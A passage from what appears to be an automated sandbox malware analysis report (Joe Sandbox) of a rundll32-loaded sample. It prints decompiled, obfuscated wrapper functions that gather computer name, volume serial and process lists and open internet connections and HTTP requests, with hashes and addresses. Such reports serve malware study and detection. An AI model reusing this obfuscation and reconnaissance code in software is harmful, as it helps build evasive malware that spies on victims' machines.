				_v8 = _v8 + 0xffff5bfb;
				_v8 = _v8 ^ 0xffffddd5;
				_v16 = 0xa71b;
				_v16 = _v16 >> 9;
				_push(0x9baba576);
				_v16 = _v16 / _t77;
				_v16 = _v16 ^ 0x00004cca;
				E002904D5(0x16d, _v16 % _t77);
				_t73 = CreateFileW(_a32, _a20, _t84, 0, _t85, _a36, 0); // executed
				return _t73;
			}

0x00284933
0x00284938
0x0028493a
0x0028493d
0x0028493f
0x00284942
0x00284945
0x00284948
0x00284949
0x0028494c
0x0028494f
0x00284950
0x00284953
0x00284956
0x00284959
0x0028495a
0x0028495b
0x00284960
0x0028496a
0x00284973
0x00284976
0x0028497d
0x00284981
0x00284988
0x0028498c
0x00284993
0x0028499f
0x002849a4
0x002849ad
0x002849ae
0x002849b6
0x002849b9
0x002849c0
0x002849c7
0x002849cb
0x002849cf
0x002849d6
0x002849dd
0x002849e4
0x002849ed
0x002849f2
0x002849fa
0x00284a0d
0x00284a22
0x00284a2a

APIs

CreateFileW.KERNEL32(00004BF2,004C0B57,?,00000000,?,00004BF2,00000000), ref: 00284A22

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d7eaa5e1d21be338b1cd6ce6653cfaaa8da155c2e378965c531edad88466e545
Instruction ID: f39873d26633dadb8a11f505e53b843122dac898205653a45610ae1d2f1951d8
Opcode Fuzzy Hash: d7eaa5e1d21be338b1cd6ce6653cfaaa8da155c2e378965c531edad88466e545
Instruction Fuzzy Hash: CC313372D0020CBFDF05DF95CC4A8EEBBB5FB48308F508158F91866260D3B59A659F80

Uniqueness

Uniqueness Score: -1.00%

Function 0029C50B, Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0029C50B(void* __ecx, void* __edx, intOrPtr _a4, DWORD* _a8, WCHAR* _a12, intOrPtr _a20, intOrPtr _a36) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t65;
				signed int _t67;
				signed int _t68;

				_push(0);
				_push(0);
				_push(_a36);
				_push(0);
				_push(0);
				_push(0);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002856B2(_t54);
				_v28 = 0x6f4f9;
				_v24 = 0;
				_v12 = 0x19f4;
				_t67 = 0x51;
				_v12 = _v12 / _t67;
				_v12 = _v12 | 0x41029982;
				_v12 = _v12 + 0xffffd676;
				_v12 = _v12 ^ 0x41027c62;
				_v20 = 0x9366;
				_v20 = _v20 >> 0xa;
				_t68 = 0x5c;
				_push(0xf9b1620b);
				_v20 = _v20 / _t68;
				_v20 = _v20 ^ 0x00006f8a;
				_v8 = 0x6bec;
				_v8 = _v8 >> 7;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0x5dfb;
				_v8 = _v8 ^ 0x00007eae;
				_v16 = 0xefbb;
				_v16 = _v16 + 0xffff58da;
				_v16 = _v16 + 0xffff8f07;
				_v16 = _v16 ^ 0xffffb184;
				_push(0xd3224cb2);
				E002904D5(0x15c, _v20 % _t68);
				_t65 = GetVolumeInformationW(_a12, 0, 0, _a8, 0, 0, 0, 0); // executed
				return _t65;
			}

0x0029c514
0x0029c515
0x0029c516
0x0029c519
0x0029c51a
0x0029c51b
0x0029c51c
0x0029c51f
0x0029c520
0x0029c523
0x0029c526
0x0029c52b
0x0029c530
0x0029c53a
0x0029c53f
0x0029c54b
0x0029c550
0x0029c555
0x0029c55c
0x0029c563
0x0029c56a
0x0029c571
0x0029c578
0x0029c57b
0x0029c580
0x0029c586
0x0029c592
0x0029c599
0x0029c59d
0x0029c5a1
0x0029c5a8
0x0029c5af
0x0029c5b6
0x0029c5bd
0x0029c5c4
0x0029c5d7
0x0029c5dc
0x0029c5f0
0x0029c5f6

APIs

GetVolumeInformationW.KERNELBASE(00006F8A,00000000,00000000,FFFFB184,00000000,00000000,00000000,00000000), ref: 0029C5F0

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 751c751d97b5f00cc3985dfa9f01fad59a3f52de927d4408f4af6447fe5d49e4
Instruction ID: a545e9d647c16e6244045e2057ba8c62e5b5f502b43bd379161aadce5d8a90c4
Opcode Fuzzy Hash: 751c751d97b5f00cc3985dfa9f01fad59a3f52de927d4408f4af6447fe5d49e4
Instruction Fuzzy Hash: AB211271D02229BBDF24CEA5CC498DFBFB9FF41364F108198E518A6290D3B64A60CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00289B08, Relevance: 1.6, APIs: 1, Instructions: 68
networkCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00289B08(void* __edx, intOrPtr _a4, long _a12, intOrPtr _a16, intOrPtr _a24, unsigned int _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a48, intOrPtr _a52, WCHAR* _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				void* _t54;
				void* _t55;
				short _t58;

				_push(_a56);
				_t58 = _a28;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_t58 & 0x0000ffff);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				_push(0);
				E002856B2(_t58 & 0x0000ffff);
				_v24 = 0x475dd8;
				_v20 = 0;
				_v12 = 0xc9e7;
				_v12 = _v12 | 0xbf4a216e;
				_v12 = _v12 ^ 0xfeb3002f;
				_v12 = _v12 ^ 0x41f9cc99;
				_v8 = 0x1b6a;
				_v8 = _v8 + 0x5f12;
				_v8 = _v8 | 0xb32772f4;
				_v8 = _v8 ^ 0xb3270a67;
				_a28 = 0x3595;
				_a28 = _a28 + 0xffff4921;
				_a28 = _a28 >> 9;
				_a28 = _a28 ^ 0x007f9464;
				_v16 = 0x2ac1;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 ^ 0x00003993;
				_push(0x692dd47f);
				_push(0x13d10e47);
				_t55 = 0x42;
				E002904D5(_t55, __edx);
				_t54 = InternetConnectW(_a32, _a56, _t58, 0, 0, _a12, 0, 0); // executed
				return _t54;
			}

0x00289b10
0x00289b13
0x00289b18
0x00289b1e
0x00289b21
0x00289b22
0x00289b25
0x00289b28
0x00289b2b
0x00289b2c
0x00289b2f
0x00289b30
0x00289b33
0x00289b36
0x00289b37
0x00289b3a
0x00289b3b
0x00289b3c
0x00289b41
0x00289b4b
0x00289b4e
0x00289b55
0x00289b5c
0x00289b63
0x00289b6a
0x00289b71
0x00289b78
0x00289b7f
0x00289b86
0x00289b8d
0x00289b94
0x00289b98
0x00289b9f
0x00289ba6
0x00289baa
0x00289bbd
0x00289bc5
0x00289bcc
0x00289bcd
0x00289be3
0x00289bea

APIs

InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 00289BE3

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: cad378419edcef76854721d673c6974b65b85482f3456da7614a4da3413c3be5
Instruction ID: 87b8ac5e5f9e17436bb17fa9c234d02a7c570e4eded6a5ad16b9a42d7505c85f
Opcode Fuzzy Hash: cad378419edcef76854721d673c6974b65b85482f3456da7614a4da3413c3be5
Instruction Fuzzy Hash: 0421067290124CFBDF119E95CC09CDEBFB5FF99714F118149F914A2220D3798A64DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0028D6D8, Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E0028D6D8(void* __ecx, void* __edx, _Unknown_base(*)()* _a8, intOrPtr _a12, void* _a20, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t48;
				void* _t58;
				signed int _t60;

				_push(_a36);
				_push(_a32);
				_push(0);
				_push(0);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(0);
				E002856B2(_t48);
				_v20 = 0x8203;
				_t60 = 0x7f;
				_v20 = _v20 * 0x36;
				_v20 = _v20 + 0xffffae66;
				_v20 = _v20 ^ 0x001b6c4e;
				_v16 = 0xd60e;
				_v16 = _v16 + 0xffff76bd;
				_v16 = _v16 >> 3;
				_v16 = _v16 ^ 0x000004dd;
				_v12 = 0xaf3e;
				_push(0xf9b1620b);
				_v12 = _v12 / _t60;
				_v12 = _v12 + 0x2813;
				_v12 = _v12 ^ 0xde9dbcef;
				_v12 = _v12 ^ 0xde9dd80f;
				_v8 = 0x4cca;
				_v8 = _v8 << 0xe;
				_v8 = _v8 + 0xffffc9ad;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x4cc96563;
				_push(0x2bb03c0f);
				E002904D5(0x187, _v12 % _t60);
				_t58 = CreateThread(0, 0, _a8, _a20, 0, 0); // executed
				return _t58;
			}

0x0028d6df
0x0028d6e4
0x0028d6e7
0x0028d6e8
0x0028d6e9
0x0028d6ec
0x0028d6ed
0x0028d6f0
0x0028d6f3
0x0028d6f6
0x0028d6fb
0x0028d70d
0x0028d70e
0x0028d711
0x0028d718
0x0028d71f
0x0028d726
0x0028d72d
0x0028d731
0x0028d738
0x0028d744
0x0028d749
0x0028d74f
0x0028d75b
0x0028d762
0x0028d769
0x0028d770
0x0028d774
0x0028d77b
0x0028d77f
0x0028d792
0x0028d797
0x0028d7a9
0x0028d7af

APIs

CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0028D7A9

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: ec2fb6cf456e068fd742da01d49bb585e15cddb04d7f62faaafa3110f952dc58
Instruction ID: af0a0787075791e57137247494321dd861a0891e14963294963c9f469912249a
Opcode Fuzzy Hash: ec2fb6cf456e068fd742da01d49bb585e15cddb04d7f62faaafa3110f952dc58
Instruction Fuzzy Hash: 412103B1C02229ABDF24DFE5C8498DEBFB4FF04364F108188E52866290D7B58B64CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00287D55, Relevance: 1.6, APIs: 1, Instructions: 63
networkCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00287D55(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t61;
				signed int _t63;
				void* _t69;

				_push(0xffffffff);
				_push(_a28);
				_t69 = __edx;
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002856B2(_t49);
				_v12 = 0xc7f4;
				_v12 = _v12 + 0xffff9efd;
				_v12 = _v12 ^ 0x9fa018c6;
				_v12 = _v12 ^ 0xe0e43b95;
				_v12 = _v12 ^ 0x7f4404d0;
				_v8 = 0xdbc4;
				_t63 = 0x2f;
				_push(0x692dd47f);
				_v8 = _v8 * 0x64;
				_v8 = _v8 | 0xa4418e2e;
				_push(0x433a6791);
				_v8 = _v8 * 0x72;
				_v8 = _v8 ^ 0x2e3d78c8;
				_v20 = 0x46e8;
				_v20 = _v20 * 0x57;
				_v20 = _v20 ^ 0x0018245c;
				_v16 = 0x8779;
				_v16 = _v16 / _t63;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 ^ 0x00006653;
				E002904D5(1, _v16 % _t63);
				_t61 = HttpSendRequestW(_a16, _a4, 0xffffffff, _t69, _a20); // executed
				return _t61;
			}

0x00287d5c
0x00287d5e
0x00287d61
0x00287d63
0x00287d66
0x00287d69
0x00287d6c
0x00287d6f
0x00287d72
0x00287d75
0x00287d77
0x00287d7c
0x00287d86
0x00287d8f
0x00287d96
0x00287d9d
0x00287da4
0x00287db1
0x00287db2
0x00287dba
0x00287dbd
0x00287dc8
0x00287dcd
0x00287dd0
0x00287dd7
0x00287de2
0x00287de5
0x00287dec
0x00287dfa
0x00287dfe
0x00287e02
0x00287e15
0x00287e29
0x00287e2f

APIs

HttpSendRequestW.WININET(2A775466,7F4404D0,000000FF,00000000,?), ref: 00287E29

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: 0bb4fa2a1c74c47decfbdcb3b380e60a520170b3680389f8f35f9feb49e95ec9
Instruction ID: 2de34f52d235f3067195b09f9133769d2939b6b894001b6249534c049f234215
Opcode Fuzzy Hash: 0bb4fa2a1c74c47decfbdcb3b380e60a520170b3680389f8f35f9feb49e95ec9
Instruction Fuzzy Hash: 81210476C05219BBDF04DFA9D9468DEBFB1FB04310F208199E924A62A0D3759A649F80

Uniqueness

Uniqueness Score: -1.00%

Function 0029C901, Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E0029C901(void* __ecx, CHAR* __edx, DWORD* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t52;
				int _t63;
				signed int _t65;
				signed int _t66;
				CHAR* _t73;

				_push(_a8);
				_t73 = __edx;
				_push(_a4);
				_push(__edx);
				E002856B2(_t52);
				_v24 = _v24 & 0x00000000;
				_v32 = 0xb4681;
				_v28 = 0x2246be;
				_v16 = 0xa5ee;
				_v16 = _v16 + 0xffffdf6c;
				_v16 = _v16 << 6;
				_t65 = 0x22;
				_v16 = _v16 / _t65;
				_v16 = _v16 ^ 0x0000b78c;
				_v20 = 0xddb2;
				_t66 = 0x31;
				_push(0xf9b1620b);
				_v20 = _v20 / _t66;
				_v20 = _v20 ^ 0x0000249e;
				_v12 = 0x1c88;
				_v12 = _v12 ^ 0xd6e4e433;
				_v12 = _v12 | 0x1b7a42f9;
				_v12 = _v12 + 0x670a;
				_v12 = _v12 ^ 0xdfff16d6;
				_v8 = 0xe03;
				_v8 = _v8 + 0xfffff416;
				_v8 = _v8 + 0xffff88f7;
				_v8 = _v8 + 0xf8c8;
				_v8 = _v8 ^ 0x00008a81;
				_push(0xddecbacc);
				E002904D5(0x31f, _v20 % _t66);
				_t63 = GetComputerNameA(_t73, _a4); // executed
				return _t63;
			}

0x0029c908
0x0029c90b
0x0029c90d
0x0029c910
0x0029c912
0x0029c917
0x0029c91e
0x0029c927
0x0029c92e
0x0029c935
0x0029c93c
0x0029c945
0x0029c94a
0x0029c94f
0x0029c956
0x0029c960
0x0029c963
0x0029c968
0x0029c96e
0x0029c97a
0x0029c981
0x0029c988
0x0029c98f
0x0029c996
0x0029c99d
0x0029c9a4
0x0029c9ab
0x0029c9b2
0x0029c9b9
0x0029c9cc
0x0029c9d1
0x0029c9dd
0x0029c9e3

APIs

GetComputerNameA.KERNEL32(?,DFFF16D6,?,?,?,?,?,?,?,?,?,?,?,0479232B), ref: 0029C9DD

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 7a69d278424e2897f8730225710ee441e06fade3660a885a0f6cc660df81c7af
Instruction ID: adda38b866bf7f4a6db060a439897eab26e74d398e2a6c96f683d4d1d42daf8a
Opcode Fuzzy Hash: 7a69d278424e2897f8730225710ee441e06fade3660a885a0f6cc660df81c7af
Instruction Fuzzy Hash: D52135B2D0031CEBEB14EFE9C8494EEBBB4FF10314F508189E82466291E7B94B548F90

Uniqueness

Uniqueness Score: -1.00%

Function 00291196, Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00291196(void* __ecx, void* __edx, intOrPtr _a4, struct tagPROCESSENTRY32W _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t45;
				int _t59;
				signed int _t61;
				signed int _t62;
				void* _t69;

				_push(_a12);
				_t69 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002856B2(_t45);
				_v12 = 0xa40f;
				_t61 = 0x3e;
				_v12 = _v12 / _t61;
				_v12 = _v12 << 4;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x00006a41;
				_v20 = 0x1f59;
				_t62 = 0x5f;
				_push(0xf9b1620b);
				_v20 = _v20 / _t62;
				_v20 = _v20 ^ 0x00005ead;
				_v16 = 0x68f;
				_push(0x9b34ee9f);
				_v16 = _v16 * 0x50;
				_v16 = _v16 ^ 0x0002016b;
				_v8 = 0x9fa2;
				_v8 = _v8 + 0xffff70dd;
				_v8 = _v8 * 5;
				_v8 = _v8 * 0x2b;
				_v8 = _v8 ^ 0x000dea15;
				E002904D5(0x1a0, _v20 % _t62);
				_t59 = Process32NextW(_t69, _a8); // executed
				return _t59;
			}

0x0029119d
0x002911a0
0x002911a2
0x002911a5
0x002911a8
0x002911aa
0x002911af
0x002911c0
0x002911c5
0x002911ca
0x002911ce
0x002911d2
0x002911d9
0x002911e3
0x002911e6
0x002911eb
0x002911f1
0x002911fd
0x00291208
0x0029120d
0x00291210
0x00291217
0x0029121e
0x00291229
0x00291230
0x00291233
0x00291246
0x00291252
0x00291258

APIs

Process32NextW.KERNEL32(FFFFA0E4,0002016B,?,?,?,?,?,?,?,?,?,?,?,?,FFFFA0E4), ref: 00291252

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: 316e4218f9cfcc21b7baeb5a10299c1b0081a239427ba8f9b35e5f187b22ac19
Instruction ID: c21be56f76666e22479d7c5b84beb8f5f86722afe223af934fac28e12133e635
Opcode Fuzzy Hash: 316e4218f9cfcc21b7baeb5a10299c1b0081a239427ba8f9b35e5f187b22ac19
Instruction Fuzzy Hash: 41215B71D00209EBDF08EFA4C9498EEBBB5FF44304F10C099E424AB280D7B55B548F41

Uniqueness

Uniqueness Score: -1.00%

Function 00281D54, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00281E0C

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 7893705023e0342a7cd03c01fb48380ada36fa37b15ddf495c5e823a11f917f8
Instruction ID: 64c0756f966b3dc5e09049a0132b326047d27974670792d309213f77e0584400
Opcode Fuzzy Hash: 7893705023e0342a7cd03c01fb48380ada36fa37b15ddf495c5e823a11f917f8
Instruction Fuzzy Hash: 46211072D01219ABDF11AFE5CD4A8EEBFB4FF05318F108088E914662A0D7799A25DF91

Uniqueness

Uniqueness Score: -1.00%

Function 002889C3, Relevance: 1.6, APIs: 1, Instructions: 57
networkCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E002889C3(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a24) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t39;
				void* _t46;
				WCHAR* _t51;

				_t51 = __ecx;
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				E002856B2(_t39);
				_v36 = 0x2c0c07;
				_v32 = 0x558830;
				_v28 = 0;
				_v24 = 0;
				_v8 = 0xa422;
				_v8 = _v8 | 0x9ff36fef;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x00278913;
				_v20 = 0xfb2a;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x000077ba;
				_v12 = 0xde2a;
				_v12 = _v12 | 0x3f86f16a;
				_v12 = _v12 << 0xe;
				_v12 = _v12 ^ 0xbfdaa602;
				_v16 = 0xe5a8;
				_v16 = _v16 + 0x3918;
				_v16 = _v16 ^ 0x000166df;
				E002904D5(0x205, __edx, 0x9c0af8a5, 0x692dd47f, __ecx, 0, _a4);
				_t46 = InternetOpenW(_t51, _a24, 0, 0, 0); // executed
				return _t46;
			}

0x002889cd
0x002889cf
0x002889d0
0x002889d3
0x002889d4
0x002889d7
0x002889da
0x002889e2
0x002889e7
0x002889f1
0x002889fd
0x00288a00
0x00288a03
0x00288a0a
0x00288a11
0x00288a15
0x00288a1c
0x00288a23
0x00288a27
0x00288a2e
0x00288a35
0x00288a3c
0x00288a40
0x00288a47
0x00288a4e
0x00288a55
0x00288a75
0x00288a84
0x00288a8b

APIs

InternetOpenW.WININET(?,00558830,00000000,00000000,00000000), ref: 00288A84

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 03ba23657f9487ddd24b789e24cd4af9a5e4af0e5c0a04fbd687343afe3b5246
Instruction ID: 6680eb056f068cbe127c752666847250e01b42ed6edfb55723baedb1f35a4071
Opcode Fuzzy Hash: 03ba23657f9487ddd24b789e24cd4af9a5e4af0e5c0a04fbd687343afe3b5246
Instruction Fuzzy Hash: 71212472C0121DABDF15AFD6C8098AFBFB8FF85304F108149E920A6210D7B84B68DF91

Uniqueness

Uniqueness Score: -1.00%

Function 0028C951, Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E0028C951(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, struct tagPROCESSENTRY32W* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t44;
				void* _t56;
				signed int _t58;
				void* _t63;

				_push(_a16);
				_t63 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002856B2(_t44);
				_v12 = 0x20c;
				_v12 = _v12 + 0xc5bc;
				_v12 = _v12 | 0xc79233fb;
				_v12 = _v12 ^ 0xc792ea07;
				_v20 = 0x8ab9;
				_v20 = _v20 + 0x10d1;
				_v20 = _v20 ^ 0x0000cc44;
				_v16 = 0xa39b;
				_t58 = 0x5a;
				_push(0xf9b1620b);
				_v16 = _v16 * 0x66;
				_v16 = _v16 + 0xffffcf1f;
				_v16 = _v16 ^ 0x0040f1b3;
				_v8 = 0x11d9;
				_push(0x354cd47c);
				_v8 = _v8 * 0x3f;
				_v8 = _v8 / _t58;
				_v8 = _v8 * 0xe;
				_v8 = _v8 ^ 0x0000d783;
				_t56 = E002904D5(0xfc, _v8 % _t58);
				Process32FirstW(_t63, _a12); // executed
				return _t56;
			}

0x0028c958
0x0028c95b
0x0028c95d
0x0028c960
0x0028c963
0x0028c966
0x0028c967
0x0028c968
0x0028c96d
0x0028c97f
0x0028c986
0x0028c98d
0x0028c994
0x0028c99b
0x0028c9a2
0x0028c9a9
0x0028c9b6
0x0028c9b7
0x0028c9bf
0x0028c9c2
0x0028c9c9
0x0028c9d0
0x0028c9db
0x0028c9e0
0x0028c9ed
0x0028c9f4
0x0028c9f7
0x0028ca0a
0x0028ca16
0x0028ca1c

APIs

Process32FirstW.KERNEL32(FFFFA0E4,0000CC44,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFA0E4), ref: 0028CA16

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: FirstProcess32
String ID:
API String ID: 2623510744-0
Opcode ID: 5732bbd813ff0b8c2837b36a330df8e8d74cc142d996667fc2185082de2e0de9
Instruction ID: a660ff44decbd48fe12bf1e4088b39500c69763baecd2d10d9616033ce3c9166
Opcode Fuzzy Hash: 5732bbd813ff0b8c2837b36a330df8e8d74cc142d996667fc2185082de2e0de9
Instruction Fuzzy Hash: CA21F0B1D05209EBEB18DFA8C9468DEBBB4FB44314F108199E514AA290D7B85B54AF80

Uniqueness

Uniqueness Score: -1.00%

Function 0028C62B, Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0028C62B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t39;
				intOrPtr* _t46;
				void* _t47;
				void* _t51;

				_t51 = __ecx;
				E002856B2(_t39);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x12444a;
				_v20 = 0x3c0c;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0x0078469a;
				_v12 = 0x33b5;
				_v12 = _v12 * 0x3d;
				_v12 = _v12 ^ 0x4b966a48;
				_v12 = _v12 ^ 0x4b9a2cb3;
				_v8 = 0xb4c;
				_v8 = _v8 + 0x1cdf;
				_v8 = _v8 ^ 0x571925bc;
				_v8 = _v8 ^ 0x57191249;
				_v16 = 0xa885;
				_v16 = _v16 | 0x9abf132f;
				_v16 = _v16 ^ 0x9abfda67;
				_t46 = E002904D5(0x319, __edx, 0x8bfbf7c0, 0xf9b1620b, __ecx, __edx, _a4);
				_t47 =  *_t46(_a8, 0, _t51, _a16, _a8, _a12, _a16, _a20, 0); // executed
				return _t47;
			}

0x0028c637
0x0028c647
0x0028c64c
0x0028c653
0x0028c65f
0x0028c666
0x0028c66a
0x0028c671
0x0028c684
0x0028c687
0x0028c68e
0x0028c695
0x0028c69c
0x0028c6a3
0x0028c6aa
0x0028c6b1
0x0028c6b8
0x0028c6bf
0x0028c6d7
0x0028c6e8
0x0028c6ee

APIs

QueryFullProcessImageNameW.KERNEL32(9ABFDA67,00000000,008E4FE7,00000000), ref: 0028C6E8

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
